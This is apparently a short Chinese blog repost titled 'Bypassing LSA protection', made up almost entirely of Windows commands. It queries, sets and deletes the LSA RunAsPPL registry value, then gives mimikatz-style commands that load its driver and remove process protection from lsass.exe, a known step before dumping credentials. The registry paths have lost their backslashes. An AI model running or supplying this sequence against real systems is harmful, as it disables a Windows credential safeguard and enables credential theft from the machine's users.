https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn408187(v=ws.11)
reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA /v RunAsPPL /t REG_DWORD /d 1 /f
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA /v RunAsPPL /f
privilege::debug
!+
!processprotect /process:lsass.exe /remove
本文始发于微信公众号(XG小刚):绕过LSA保护
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论